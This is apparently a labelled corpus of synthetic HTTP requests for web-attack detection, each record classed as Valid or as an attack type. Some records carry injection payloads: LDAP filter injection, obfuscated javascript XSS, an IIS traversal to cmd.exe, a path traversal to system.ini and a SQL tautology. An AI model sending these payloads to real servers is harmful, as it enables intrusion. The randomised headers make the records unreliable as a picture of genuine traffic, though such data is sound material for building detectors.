Warning: 300 www.6tf78e.gif "ECeisthegenu0bmdifMi" "Wed, 22 Jun 05 01:38:52 UTC"
X-Forwarded-For: 185.226.136.192
X-Serial-Number: 08906693343681546390
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3400
Start - Id: 14824
class: Valid
GET /hjjFNV6fH-Nayw5N7h/nobmnEh21/7R-0tEnYqk4xUm9Lvv/tOIL9.G/tp8dOveez7nroB6N5Ij5.js?WCUcopy=l%3D&nVhrs=heoi4iWsRortsi%3C&URHO4mxz=onee1eeourHotth0a02&9.bnvrmexec=%2Fa1A+asformchildp9s&doneEy=Xq5hi HTTP/1.0
Host: www.orsrhOeel.fr:730
Connection: close
Accept: audio/*;q=0.5, video/mpeg, audio/*
Accept-Charset: euc-kr;q=0.2, utf-8;q=0.3, x-mac-ce;q=0.2, iso-8859-9, windows-1254;q=0.9
Accept-Encoding: compress, identity
Accept-Language: oethadst-lrt95xt, 5bfl4lr-l;q=0.7, dunw-et;q=0.9, searsrd-Ut;q=0.8, atMv98-ccaaws
Cache-Control: max-stale=6493
Client-ip: 237.183.88.12
Cookie: cth9r=neead9eRatg;qreee=811729837;ioutgftCttho=e7dc3?)eopt
Cookie2: $Version="50"
Date: Mon, 13 Feb 06 16:49:44 GMT
ETag: W/"Qt6__j8ZaLy@bPXJiWRa"
Expect: 100-continue
From: 7dmt3haa@civb.net
If-Modified-Since: Sun, 13 Dec 09 16:58:39 GMT
If-Unmodified-Since: Tue, 23 Jan 07 08:59:41 GMT
If-Match: "ivv05JwpEqSLrRX6lA"
If-None-Match: *
If-Range: ".jMEGjbQlXholOpa-Og"
Max-Forwards: 3
MIME-Version: 6.9
Pragma: 9na=s3ote
Proxy-Authorization: niosi tjsll=y4sneodh
Authorization: Digest cnonce="nbil"
Range: 43-,13433-8
Referer: http://www.xana1.net/sue0h/Rsidtda/timFEoo1/hnhi4fls/4hotdid.gif
TE: trailers,chunked;q=0.6
Trailer: Date
User-Agent: Mozilla/4.5 (compatible; MSIE 1.2; Windows NT; ehfeseb)
UA-CPU: 68000
UA-Disp: 1041,483,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 923x8805
Via: HTTP/9.0 249.249.106.110, 8.1 www.IniEsle.htm:30, FTP/7.0 www.rrtdoh0.tiff
Transfer-Encoding: gzip
Upgrade: altl/2.2
Warning: 387 165.171.90.131 "hiaiten8hm8" 
X-Forwarded-For: 220.203.31.112
X-Serial-Number: 89813
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14824
Start - Id: 38410
class: LdapInjection
GET /dW.b/wUG/6ycotuGhlL78/eL/leSaleudueFireqsrtte/pt4siuh/ir12tWbxmlEL5Cr/edooame8ema7mdi/r8rn13nsamn/mZl/m8T5u7/j2t0etarybsh.jsp?d9s66ngycuts=rr%29%28++++%7C+%28llpe%3D*%29 HTTP/1.0
Host: 250.245.216.35:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-9;q=0.3, koi8-r, iso-10646-ucs-2, x-mac-japanese;q=0.6, iso-8859-4;q=0.6
Accept-Encoding: deflate;q=0.5, identity;q=0.8, identity
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 134.194.27.49
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="47"
Date: Wed, 03 May 06 20:08:00 CET
ETag: "JZkK31Fb0gEGvuf_"
Expect: c2dEa
From: uftet9d@Engnam.uk
If-Modified-Since: Sun, 01 Feb 09 16:32:11 UTC
If-Unmodified-Since: Sat, 12 Mar 05 03:51:09 UTC
If-Match: *
If-None-Match: ".L_JaC87n1VuK80YnxRg"
If-Range: "-TG6qbEQt@McZzkKl@IQ"
Max-Forwards: 0
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: h80n hmasNo=a0xee
Authorization: NTLM Ym9oZmg1dDJ0bmV1YWxlaWp5MW4wc3R0ZWQyZGVhaGdyeXVldA==
Range: -96373
Referer: http://i7ursrt4.de/Dncr/heek.html
TE: trailers
Trailer: Max-Forwards
User-Agent: Rv4sljrledvrgetthddi
UA-CPU: MIPS
UA-Disp: 2631,041,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7262x7113
Via: DiTIrh/7.1 www.heuideh.gif:11510, HTTP/1.4 www.sieiptN.png
Transfer-Encoding: gzip
Upgrade: Elgm/6.3, hea/6.4, She/5.1, dol/2.2
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38410
Start - Id: 5828
class: Valid
PUT /y4cld8Ql/eurdq8olsfocth9dko/rL.1kPVCBv.gif? HTTP/1.1
Content-Length: 48
Content-Language: i
Content-Encoding: compress
Content-Location: /ie5Ln9.cfm
Content-MD5: MGF0YnRlc3NyM0hnc2gwYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Jan 07 23:46:49 UTC
Last-Modified: Thu, 22 Apr 04 03:27:05 UTC
Host: www.nbvs.org
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-2022-kr;q=0.9, iso-8859-3
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: ssrcg=rMoraq
Client-ip: 109.157.141.38
Cookie: Rh=65236084
Cookie2: $Version="05"
Date: Fri, 26 Jan 07 16:07:25 GMT
ETag: W/"IOnnZpGFB8wh@D0eymlY"
Expect: De4wfa
From: uidosta@cHrc6eaEh.fr
If-Modified-Since: Fri, 27 Jun 08 05:01:34 UTC
If-Unmodified-Since: Wed, 15 Oct 08 23:48:33 GMT
If-Match: "ClSKCmduN@bpGgQtZk"
If-None-Match: "VbdlU48ut7B761XxsYz"
If-Range: Tue, 05 Oct 04 08:17:13 UTC
Max-Forwards: 50
MIME-Version: 3.8
Pragma: w=u2ajsiiw
Proxy-Authorization: NTLM dHdzcGVzcnZudGhiTmhlbXRkaGZkZXJvOXBrMGhjZXN1MmFyaHRubm8=
Authorization: Basic YWVlTjpldHA4Y2lt
Range: 8139-781351,-939422,275351-
Referer: /oawn/dIoRdezS/deNnIoa/0ialrai.swf
TE: chunked,deflate;q=0.1,trailers
Trailer: Accept
User-Agent: sh44spms
UA-CPU: MIPS
UA-Disp: 1618,105,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1021x7299
Via: 4.1 www.d5Aeb.css:08, 0.9 231.83.121.77, 7.0 41.228.137.234:1366
Transfer-Encoding: deflate
Upgrade: rES/6.3
Warning: 755 www.nlkObec.css "1rjdirwgsHi" 
X-Forwarded-For: 238.36.196.14
X-Serial-Number: 8692230651
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ydo=Vhr&IrJrPeeKdpgd=avx:&inpohtosewbr=eu( a

End - Id: 5828
Start - Id: 46894
class: XSS
PUT /svdWZx5Gx/boot.iniP@2oTobjectCfromXO/qlntd6r47lmns/zKGt/cf4/byes/4iaVT_CjVPK.jpeg? HTTP/1.1
Content-Length: 334
Content-Language: eaotvd8,I6c
Content-Encoding: identity
Content-Location: http://esophy.biz/lwiq4sh.jsp
Content-MD5: b2VtNXFyYVB0Tm5pZU5wNg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 03 Feb 09 06:47:09 CET
Last-Modified: Thu, 18 Aug 05 09:39:03 UTC
Host: www.4ean5urtey.it:6725
Connection: ahhor
Accept: image/gif;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nppI-iuie;q=0.2
Cache-Control: no-cache
Client-ip: 164.249.24.153
Cookie: dPo=yFL7Yn8sjtuI
Cookie2: $Version="07"
Date: Fri, 16 Feb 07 13:31:34 UTC
ETag: "PfI32g8MOmatvmWLH"
Expect: 100-continue
From: nbfea3@yM2KA0.biz
If-Modified-Since: Mon, 21 Aug 06 24:06:10 CET
If-Unmodified-Since: Tue, 02 Sep 08 16:47:06 CET
If-Match: "pnDiXMSWaz02KzTcSk-2"
If-None-Match: "Ia72rDMha33-36QKmb"
If-Range: "uHeCFJUM3hpw0bkci"
Max-Forwards: 2808
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: f77db aetmsn=Lobo5twv
Range: -1
Referer: /slox0.jpeg
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.3 (Windows; U; Win98 5.8; 6k-om; rv:9.7.2) Gecko/07871401
UA-CPU: MIPS
UA-Disp: 457,6373,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8473x700
Via: 0.6 www.Tartswsg.html
Transfer-Encoding: 1urtl3; zeen5=tyQahae
Upgrade: c7hl/0.0, ojnjz/4.8, sotds/6.5
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ------------------
~~~~~: ~~~~~~~~~~~

dodguda8gaSd7if=tgsaeol1lh&sce9rlnetee=n90rettd6axfAIls&YN78%ua4par=nhnRS5oam6rf19&Oa=ejzb6br-&Oem=e-q.HMOAVT&hHoUNnodeEX@pBU=tkte%27sanddb&hi=e5ohe95ewqenaoa&fdanhepireksinn=euh+hsam5fiX&taEeaefa=%242%28&yinaibpe=164212078&reoie3tEStctte=%3Ca++href+%3D+%22++javas%26%2399%3Bript%26%2335%3B%5Balert+%28%27otinr1ea%27%29%3B%5D%22+++%3E

End - Id: 46894
Start - Id: 11044
class: Valid
GET /So_37x/ylliEdqA.exe? HTTP/1.0
Host: 111.64.48.232:80
Connection: irlebtth
Accept: */*;q=0.3
Accept-Charset: macintosh, x-mac-chinesetrad, x-mac-cyrillic;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 229.4.31.216
Cookie: ahhfeuhe5ntpda=tl3Cja88;rcarro=cndO_k2F;Uepqiuanf=bt(i;t9sOeth=40471916;ejdaoe=)t&~d
Cookie2: $Version="171"
Date: Sun, 17 May 09 10:22:06 CET
ETag: W/"UecBknSQLiX3Rorgsu"
Expect: 100-continue
From: szi40en@pbaUtnm9st.st
If-Modified-Since: Tue, 05 Dec 06 12:18:31 UTC
If-Unmodified-Since: Mon, 17 May 04 17:09:06 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 058
MIME-Version: 8.5
Pragma: ieHi='ertts'
Proxy-Authorization: aeeWg xqe5owa=r1ap5OA
Authorization: NTLM dElsNmRlYWFkb3VsMG5kZG50ZHNvRXp0aGxzbGRpYWxhaHQ=
Range: 22-392,-6553,-595
Referer: /scmu/1ubs/xtniw5.mspx
TE: trailers,deflate
Trailer: Connection
User-Agent: Meeaahr/8.5.6.4
UA-CPU: x86
UA-Disp: 8400,268,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1068x1035
Via: 3.0 20.186.249.163, 6rhg/3.5 www.awKtn.htm, HTTP/5.6 119.153.249.189
Transfer-Encoding: gzip
Upgrade: orc/1.6, 9fle/6.2, 08otw/8.4, Zmleef/2.9, tDi/7.7
Warning: 660 97.116.247.67 "al7pinn" "Wed, 19 Dec 07 14:44:12 CET"
X-Forwarded-For: 42.148.64.117
X-Serial-Number: 86044035
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11044
Start - Id: 36496
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.dhJq6Rteso.gov
Connection: close
Accept: video/*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: tTepiEEo-eysrohyF, ea4-tn5m, inttnFi-B2yslo;q=0.0, 1guttark-ry9liyT
Cache-Control: max-stale=7347
Client-ip: 219.137.139.146
Cookie: gei=diXE0Mhf0;ns3jot=sNMAay;es7j9arb6=147334;ttEzot=acdihn0im;eNncth=156
Cookie2: $Version="050"
Date: Wed, 09 Apr 08 15:02:09 GMT
ETag: W/"vjbM4Bxb6G26xH._"
Expect: atcEeo
From: oliee@2ucHyiTL.org
If-Modified-Since: Sun, 09 Aug 09 09:21:51 CET
If-Unmodified-Since: Thu, 21 Jan 10 17:11:10 UTC
If-Match: "lMqOAnisi3zsqiE"
If-None-Match: "cdJMnnt6ADzWwN.Cp_"
If-Range: "_z.zCFUN3Jq.GaGGwX6"
Max-Forwards: 1009
MIME-Version: 6.2
Pragma: ots98=o
Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: 0e1r d6darat=nrpk
Range: 998505-,-0540,815-
Referer: http://hnietsmh.uk/aao5.pl
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.4 (Machintosh; U; PPC Mac OS X 9.5; it-cb; rv:4.2.8) Gecko/63846013
UA-CPU: MIPS
UA-Disp: 898,9805,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 512x1298
Via: esr/2.8 113.183.178.105
Transfer-Encoding: compress
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36496
Start - Id: 28783
class: Valid
GET /ePKYEwzro_@X/obKjfnSS/rsyelGihHgaefs4am3cs/peoejes/I@uexecGcj..YhLH/qgne7strtrefewt5et5/DcopyO2BTz/naHNYZJRh2/mffZ-JYbaTi.qli/inYRuFmwbukGxvcl/wbKQ.jpeg?26edeon=567&aesgtfaa5oKRtT=5575322&fuasmrfc=2623&CtLZNpxeval3Z=z&liGulT362a=ca47&wnlScoMa=74791942&uobyge=c%2Fshe&enn=eceil&09smaUhAaoesym5=t%40rc8rMKF&p2f9rjnmei5te2=93311084&falenuaoporeh=1642&oetnone=enodeinsertxmld&trabbeadaace=sdcokaccess_log HTTP/1.1
Host: www.A0tshmpl.de
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1258;q=0.2, utf-8;q=0.2, koi8;q=0.8, macintosh;q=0.7, windows-1257;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 175.213.75.253
Cookie: heuHkndoo1et0=91;t9si5eotszlutAh=13083
Cookie2: $Version="8"
Date: Tue, 07 Sep 04 22:47:02 CET
ETag: "rHk7h3zz@PuTHBWKwI"
Expect: u2eullm
From: yrrE0@eR1rsh.ch
If-Modified-Since: Wed, 02 Nov 05 05:03:51 UTC
If-Unmodified-Since: Wed, 14 Apr 04 07:23:44 GMT
If-Match: *
If-None-Match: "Ytmk1kmTP2.YyGk"
If-Range: "456-AY3.m@lISdPZON"
Max-Forwards: 5646
MIME-Version: 1.0
Pragma: ef=uewo
Proxy-Authorization: NTLM amM2ZnVhaHVldDJ0b1hzZUEyY2FqT3JzZW9udHlib3RkczA5
Authorization: iqsse cPnhH=liwelgu
Range: -20
Referer: http://djgk.cz/tdnsts/snthf/nhonh.wmn
TE: deflate;q=0.0,chunked
Trailer: Pragma
User-Agent: wn.Aa6OO_ http://www.nrbe.uk
UA-CPU: x86
UA-Disp: 982,8595,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5260x374
Via: 4.9 93.93.8.251, 2.6 www.ishesv.jpg
Transfer-Encoding: deflate
Upgrade: dma/7.4, st8cs/3.2, ehL/8.4, tDaep/0.4
Warning: 263 www.orehreth.jpg "pIt9" "Wed, 11 Jul 07 24:19:28 CET"
X-Forwarded-For: 1.11.0.97
X-Serial-Number: 39502
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28783
Start - Id: 28960
class: Valid
GET /tiiteliqsiglndwm6eog.jpg? HTTP/1.1
Host: www.6rTgno.it
Connection: x1ztl
Accept: text/plain, image/*, video/*;q=0.5
Accept-Charset: x-mac-roman;q=0.6
Accept-Encoding: deflate;q=0.4, compress, gzip, deflate;q=0.3
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 78.125.221.48
Cookie: 0ooe=anidid2Ronwmeil;sn=0295
Cookie2: $Version="30"
Date: Sun, 28 Mar 10 11:40:26 CET
ETag: "AlH_ZvVv78c5KA9P@U"
Expect: 100-continue
From: h5hrlh@Esuhia1.cz
If-Modified-Since: Sat, 19 Aug 06 24:36:41 CET
If-Unmodified-Since: Tue, 07 Aug 07 13:31:31 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 23 May 07 02:37:03 GMT
Max-Forwards: 665
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM czFjaGFhYm1ybnRoaWFlbWVzM2F0M2lsNm5jb2VhdGxhcnBmMWdpZWI=
Authorization: Basic ZTFlMDM0ZmQ6ZmVhMGw3YW0=
Range: -332385,-432,1995-63
Referer: http://www.ieyS3.it/s381bMir/mcnms.jpeg
TE: trailers
Trailer: Range
User-Agent: mrecooetoozcrehrL
UA-CPU: MIPS
UA-Disp: 3550,9047,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1053x1221
Via: 5.6 www.qiesthA.shtml, 7.3 www.cBbjknat.jpeg, 7.2 www.etatti.tiff
Transfer-Encoding: gzip
Upgrade: SDtt/0.6, mnhrp/9.3, edgePn/8.1
Warning: 060 221.176.165.132 "oh3respRbbacere" "Fri, 16 Mar 07 05:27:50 UTC"
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 7184697
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 28960
Start - Id: 45557
class: PathTransversal
GET /mteyobe5Ao/iPePeeu/ihnnoeld3z8q/sQI@q5Wp-whereXMZKt/njB3Kl9_PJU/cclanthtbelosr/n.a3C2Xq.4/pmRhY-.html?vrnetle748om5h=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini HTTP/1.1
Host: 204.255.63.223
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-9;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 225.212.174.38
Cookie: nori=tx8anAA
Cookie2: $Version="087"
Date: Fri, 25 Jun 04 12:51:19 CET
ETag: W/"MCjDO_8o8xkGKH6Xu"
Expect: 100-continue
From: kccnlkv2@rodignu.de
If-Modified-Since: Sat, 10 Mar 07 12:14:12 CET
If-Unmodified-Since: Mon, 10 Aug 09 04:12:42 UTC
If-Match: "f9VHwgZRm03tTfOvB@u"
If-None-Match: *
If-Range: Tue, 10 Nov 09 23:51:34 GMT
Max-Forwards: 6175
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="E22F9eE11467e7b1deeE0c6f3c56A53a"
Range: -7305
Referer: http://qajpufr.st/dfta/GtRoh/ifk1wsb/mTeosrn.conf
TE: deflate;q=0.5,deflate,gzip
Trailer: If-Unmodified-Since
User-Agent: cWkXbxSN1A http://www.adutgAm.biz
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 220x9820
Via: 7.9 38.83.179.127, 9.1 www.qa2smm.tiff
Transfer-Encoding: deflate
Upgrade: tvtmyl/0.9, dEhai/7.5, oiv8C/9.2, beNr/8.8, c9orN/8.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45557
Start - Id: 42707
class: SqlInjection
POST /tIuhfo_Av/ee.php3? HTTP/1.1
Content-Length: 186
Content-Language: mVqt
Content-Encoding: deflate
Content-Location: http://aecau.it/nhee3j1/hmveeuel/owOwnC/avsn/xdhjya.wav
Content-MD5: RWhuOWx5bmVFcDVuZHN1cw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Sep 06 01:01:17 UTC
Last-Modified: Sat, 12 Jan 08 08:18:13 GMT
Host: www.ngpaer1iro.be:4226
Connection: keep-alive
Accept: video/quicktime;q=0.8
Accept-Charset: windows-1258;q=0.1, cp-936;q=0.9, x-mac-roman;q=0.8, windows-1251
Accept-Encoding: '    OR   'tl'    BETWEEN 'R'   AND  'T
Accept-Language: *
Cache-Control: no-transform
Client-ip: 228.125.37.130
Cookie: 1ues4fewodgpx=uHtlofoxsr;RLsdha=r0et;6pyuctoilay=d)so
Cookie2: $Version="3"
Date: Tue, 14 Feb 06 20:36:45 UTC
ETag: "vf1Vj8Dgz1cDubx-"
Expect: ydtvhiN
From: leyen5sh@mOloiam5r.biz
If-Modified-Since: Tue, 15 Jan 08 10:19:38 CET
If-Unmodified-Since: Mon, 14 Jul 08 15:07:42 CET
If-Match: *
If-None-Match: "Ucndbv_vfKhlIpNAphLM"
If-Range: Mon, 03 Dec 07 07:24:50 CET
Max-Forwards: 7
MIME-Version: 9.7
Pragma: areatpd=nrsaIta
Proxy-Authorization: Basic cjVuZDp4Z0ZlaHZoZg==
Authorization: Digest username="lgR2ato"
Range: -952,0696-,189-4
Referer: /Reeoawte/suyalegt/hlTfe/daeSd/sx6vio1n.htm
TE: gzip
Trailer: TE
User-Agent: Mozilla/8.1 (compatible; MSIE 6.4; Solaris; coiut; rnheowenmn; ytkwemaNoe)
UA-Disp: 179,0813,8
UA-OS: Windows 98
UA-Color: color16
Via: 4.5 153.247.103.137, 3.6 www.skresg.shtml, HTTP/4.7 www.a2tmoA.png
Transfer-Encoding: compress
Upgrade: stwept/3.7, 3caoys/9.9
Warning: 987 208.120.245.13 "dsnf" 
X-Forwarded-For: 18.244.48.193
X-Serial-Number: 0088484140288112965
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

nsyernadniy3j=TTd&uHBdnsamwindow.openmail.r6=047675627&yivie6u=619&et6uaeqtonra=ya&HbdJL=s1hodkfttemtifln&4er=rhds7radpuWae+&T9r.X%ubGN=s4cXls1stHah2oii&r31jnT=ac8cmddtM&bsahoetaara=3521

End - Id: 42707
Start - Id: 25689
class: Valid
GET /twsdnihhmyotmye/sJ/n1BNKZ5/TtaejThEynm5heotb0tt/1f@VjpPOSjto.Na.asp?ylwsar7cFu=%3E%5D&useraogloaara=49&J6Lgroup by48uJh2=338128750&Jn3m=077491&heErsut=eoTUrXng&rne9ds6i=93341442 HTTP/1.0
Host: 29.43.164.6:5496
Connection: keep-alive
Accept: audio/*;q=0.5, text/*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, gzip;q=0.2
Accept-Language: lU-lp, cceaA0x-hc;q=0.7
Cache-Control: no-cache
Client-ip: 44.170.150.214
Cookie: 5riqgrabo=eeZnp0iYEcA;1sn=tef;infsa4tbgMiE= rd7e rUss&/2a 
Cookie2: $Version="32"
Date: Tue, 21 Aug 07 09:48:26 GMT
ETag: W/"@OeX2tL83N.UW-u"
Expect: 100-continue
From: oyBm@Iqerhbe.st
If-Modified-Since: Fri, 02 Jan 09 07:48:24 GMT
If-Unmodified-Since: Mon, 25 Jan 10 05:04:54 UTC
If-Match: *
If-None-Match: "ZduOxtBhm9WbkZCZ.5f"
If-Range: Thu, 29 Apr 10 01:36:55 GMT
Max-Forwards: 5469
MIME-Version: 5.5
Pragma: vih=nhdd7Vus
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM b25pZm9lcGFlaGVXZWVuNWRpZXRlZ28xdG9lcmF1YW93ZXJp
Range: 474-85459,37271-
Referer: http://so7n.uk/wElr3i/CemmHf/badp/heUr0.mdb
TE: trailers,trailers
Trailer: Authorization
User-Agent: ciEdaEts (gE8LsBxN; eEmtPvbu1; tk0ZPOYf-e)
UA-CPU: MIPS
UA-Disp: 564,067,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8973x257
Via: FTP/3.3 104.73.237.131
Transfer-Encoding: identity
Upgrade: nts/0.5, iIqb/1.5, mnjtrh/1.0, abi/0.8
Warning: 473 www.arroi44e.png "m5ao1xhonpTIDgipma3b" 
X-Forwarded-For: 217.128.221.222
X-Serial-Number: 69267811196877405131
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25689
Start - Id: 19441
class: Valid
GET /LWEA/TTH6ETGvq/8tiSCemn6c9HTDou/mnuuhcaeEeLE.htm? HTTP/1.1
Host: 140.184.174.79
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-arabic, iso-8859-4;q=0.5, x-mac-arabic;q=0.3, x-mac-icelandic;q=0.5, iso-10646-ucs-2;q=0.0
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 168.104.135.23
Cookie: sagf7eoeYrnr7e=tseoqheitrssF;r3r=71903;tsjbA=u nnis;ideao=A;fom;doiAzodtmiankas=0891
Cookie2: $Version="7"
Date: Fri, 14 Apr 06 16:04:23 CET
ETag: W/"XOUTb51DsgF6vw2B"
Expect: ii4Il=cr9ndt;ddle7
From: rshehat@qllhSResb.de
If-Modified-Since: Fri, 01 Feb 08 04:46:38 UTC
If-Unmodified-Since: Mon, 31 May 04 15:27:21 CET
If-Match: "yXuveZ5hnbWcG5g1pr"
If-None-Match: "RLg-3pdeNCIRqZIR"
If-Range: "Fg7EgqUpIfNpiRa6Nu"
Max-Forwards: 38
MIME-Version: 8.7
Pragma: htxt7en='s7o'
Proxy-Authorization: NTLM ZGlhaUwyaG50aWxUczdoOWVsdGFmaGpmdGFvb2xiUzlaYWR0dE9sOXR0
Authorization: teomr bsaanR=rnIroe
Range: -2,6-20086
Referer: /nmvna/mo6oreE/e2v6ro/thk9soRf/eectsanl.mpeg
TE: chunked
Trailer: Max-Forwards
User-Agent: Mozilla/7.8 (X11; U; Solaris 9.6; pI-ny; rv:8.5.1) Gecko/04690859
UA-CPU: x86
UA-Disp: 915,682,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6480x436
Via: 3.0 www.Eoes.shtml
Transfer-Encoding: identity
Upgrade: 3tDr/0.3, octa/6.4
Warning: 889 www.tpb2d.html "1p2mfhiat" 
X-Forwarded-For: 83.131.31.88
X-Serial-Number: 31641026520148
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19441
Start - Id: 22407
class: Valid
GET /nph-@pwwindow.open/noqUxAKNBxNTpibLrFOQ/rIfE/t7/0lmFiiidlxantrjgei/oz.M0/ndhgdcbc9hkots/i9CgiYKpSZx.asmx? HTTP/1.0
Host: 190.158.65.51:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=68
Client-ip: 102.187.24.158
Cookie: oearaen=12242;clohXr2oat=880254
Cookie2: $Version="7"
Date: Sun, 29 Jul 07 23:15:24 UTC
ETag: "i8DWFxnOiHIA0GwWJQXT"
Expect: 100-continue
From: osurT@isn3pers.uk
If-Modified-Since: Mon, 15 Nov 04 06:40:25 CET
If-Unmodified-Since: Tue, 16 Nov 04 12:27:21 CET
If-Match: *
If-None-Match: "SlYxF6Yfz2yoVDw7"
If-Range: Sun, 08 May 05 23:06:26 UTC
Max-Forwards: 0557
MIME-Version: 0.8
Pragma: hs='tte'
Proxy-Authorization: NTLM c3NlOG5yZU50bWVIeWxuaWx4NWlldWFvaTFxZW5sYjZhVHI=
Authorization: Digest nonce
Range: 6241-,-19542
Referer: http://seeh.fr/ipfaftbi/tcfeto/oglh.php3
TE: chunked,trailers,chunked
Trailer: Authorization
User-Agent: ivjPa.lla http://www.ye4hlnyo.gov
UA-CPU: x86
UA-Disp: 1777,9655,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 112x1566
Via: 0.2 www.fvTehxe.htm
Transfer-Encoding: semre; rrroxoc=sofhed3s
Upgrade: anin8s/5.0, 42tdtt/2.9, tMob/9.6, 6sg/5.1
Warning: 245 169.86.241.14 "nhn9hhnhuaifml" "Sat, 17 Oct 09 10:05:26 CET"
X-Forwarded-For: 112.96.205.75
X-Serial-Number: 935727491848892765
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22407
Start - Id: 27743
class: Valid
GET /zHsM1/FFpositionSS29PT@c/qxtlwsycraawebeto/eetbisepteRewS.swf?receqoqioaaen=eq0A%3Fb6&Jy7umOevHG=rhtQ0FAPSIHp&91dls2wtrhat=iaortrd%5Cfi%26&aysx=nt%40ie&Ee41e=4190406&3lerirs=%5DaRl&oOrtt=%26aqghakntre%2FWq&ihceeIDnlt=w6t7teevoatljto&dXOMNGl6@CLb=dB%40&mv0Q=0ndtmp3xin&55enT1euewoTbh=dnodeosa HTTP/1.0
Host: 50.139.99.184
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aA-9eweoe;q=0.0, dn-somtosra
Cache-Control: max-stale=479
Client-ip: 111.158.89.180
Cookie: uIni=rbin' ;nqte=ktnreouaAae;B3CLM=73666;reob4lrrbmg=6130;c7gn=slBgKhmBZx
Cookie2: $Version="92"
Date: Fri, 10 Apr 09 07:00:41 GMT
